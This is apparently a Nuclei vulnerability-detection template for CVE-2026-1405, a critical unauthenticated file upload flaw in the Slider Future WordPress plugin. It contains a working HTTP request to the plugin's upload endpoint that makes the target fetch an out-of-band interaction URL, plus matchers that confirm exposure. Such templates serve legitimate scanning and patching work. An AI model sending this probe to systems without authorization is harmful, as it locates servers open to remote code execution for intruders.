id: CVE-2026-1405 info: name: WordPress Slider Future <= 1.0.5 - Unauthenticated Arbitrary File Upload author: pussycat0x severity: critical description: | Slider Future WordPress plugin <= 1.0.5 contains an unrestricted file upload vulnerability caused by missing file type validation in 'slider_future_handle_image_upload', letting unauthenticated attackers upload arbitrary files, exploit requires no authentication. remediation: | Update to a version later than 1.0.5 or the latest available version. impact: Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-1405 epss-score: 0.20498 epss-percentile: 0.95692 cwe-id: CWE-434 tags: cve,cve2026,wordpress,wp-plugin,slider-future,file-upload,rce,oast,vkev http: - raw: - | POST /wp-json/slider-future/v1/upload-image/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"image_url":"http://{{interactsh-url}}"} matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")' - 'status_code == 200' - 'contains(content_type,"application/json")' - 'contains_all(body,"url","wp-content")' condition: and # digest: 4a0a004730450220099a0cb5139f9d5cbe017eb792facd884f581c26a896587e3fb9ca5fc1ef4d4d022100a54042c14d632e23851f1d3b715e807f99062dc5aabbe4760d1545675cbf601f:922c64590222798bb761d5b6d8e72950